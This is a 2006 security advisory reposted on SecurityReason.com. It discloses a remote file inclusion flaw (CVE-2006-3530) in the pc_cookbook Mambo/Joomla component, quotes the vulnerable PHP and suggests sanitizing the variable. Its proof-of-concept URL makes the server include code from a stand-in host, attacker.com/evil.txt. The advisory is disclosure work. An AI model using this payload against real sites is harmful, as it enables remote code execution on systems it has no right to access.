SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

pc_cookbook Mambo/Joomla Component <= v0.3 Remote File Include Vulnerabilities


Arrow  SecurityAlert : 1215
Arrow  CVE : CVE-2006-3530
Arrow  SecurityRisk : High  Security Risk High  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Exploit Available : Yes
Arrow  Credit : matdhule
Arrow  Published : 14.07.2006

Arrow  Affected Software : pc_cookbook Mambo/Joomla Component <= v0.3



Arrow  Advisory Content :  

_ _____/_ ___ / | \_____ | __)_ / // ~ / | |
\ ___ Y / | /_______ / ______ /___|_ /_______ /

/ / / /

.OR.ID

ECHO_ADV_37$2006

------------------------------------------------------------------------
-----------------------

[ECHO_ADV_37$2006] pc_cookbook Mambo/Joomla Component <= v0.3 Remote File
Include Vulnerabilities

------------------------------------------------------------------------
-----------------------

Author : Ahmad Maulana a.k.a Matdhule

Date : July 10th 2006

Location : Indonesia, Jakarta

Web : http://advisories.echo.or.id/adv/adv37-matdhule-2006.txt

Critical Lvl : Highly critical

Impact : System access

Where : From Remote

------------------------------------------------------------------------

Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

pc_cookbook Component

Application : pc_cookbook Component

version : 0.3

URL : http://www.dianthos.net &
http://www.fisheye.gr/koyansblog

------------------------------------------------------------------------

Vulnerability:

~~~~~~~~~~~~~~~

in folder com_pccookbook we found vulnerability script pccookbook.php.

-----------------------pccookbook.php----------------------

....

<?php

//pc_cookbook Component//

/**

* Content code

* @package hello_world

* Original @Copyright (C) 2005 Robert Prince

* @Copyright (C) 2005 Konstantinos (koyan) Kokkorogiannis

* @ All rights reserved

* @ pc_cookbook is Free Software

* @ Released under GNU/GPL License :

http://www.gnu.org/copyleft/gpl.html

* @version koyans 0.3

* @link http://www.dianthos.net & http://www.fisheye.gr/koyansblog

**/

global $mosConfig_absolute_path;

global $mosConfig_live_site;

// include language file, or default to english

if (file_exists ($mosConfig_absolute_path .

'/components/com_pccookbook/languages/' . $mosConfig_lang . '.php')) {

include_once ($mosConfig_absolute_path .

'/components/com_pccookbook/languages/' . $mosConfig_lang . '.php');

} else {

include_once ($mosConfig_absolute_path .

'/components/com_pccookbook/languages/english.php');

} // end if

?>

...

----------------------------------------------------------

Variables $mosConfig_absolute_path are not properly sanitized. When

register_globals=on

and allow_fopenurl=on an attacker can exploit this vulnerability with a

simple php injection script.

Proof Of Concept:

~~~~~~~~~~~~~~~~

http://[target]/[path]/components/com_pccookbook/pccookbook.php?mosConfi

g_absolute_path=http://attacker.com/evil.txt?

Solution:

~~~~~~~~

sanitize variabel $mosConfig_absolute_path in pccookbook.php

------------------------------------------------------------------------

---

Shoutz:

~~~~~~

~ solpot a.k.a chris, J4mbi H4ck3r for the hacking lesson :)

~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous

~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama

~ newbie_hacker (at) yahoogroups (dot) com [email concealed],
jasakom_perjuangan (at) yahoogroups (dot) com [email concealed]

~ #mardongan #jambihackerlink #e-c-h-o @irc.dal.net

------------------------------------------------------------------------

---

Contact:

~~~~~~~

matdhule[at]gmail[dot]com

-------------------------------- [ EOF ]----------------------------------





Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc:fts_*() Multiple Denial of Service

Security Risk Medium- 2009-10-02

The fts functions are provided for traversing UNIX file hierarchies...

Apache RSS Apache Alert

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion in work
   directory

» Apache Tomcat 6.0.20 and
   5.5.28 insecure partial
   deploy after failed
   undeploy

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion and/or
   alteration

PHP RSS PHP Alert

» PHP 5.2.12/5.3.1
   session.save_path
   safe_mode and
   open_basedir bypass

» PHP 5.2.12/5.3.1 Multiple
   Vulnerabilities

» PHP 5.2.11 libgd multiple
   vulnerabilities

» PHP 5.2.11 tempnam()
   safe_mode bypass

Copyright © SecurityReason.com. All Rights Reserved.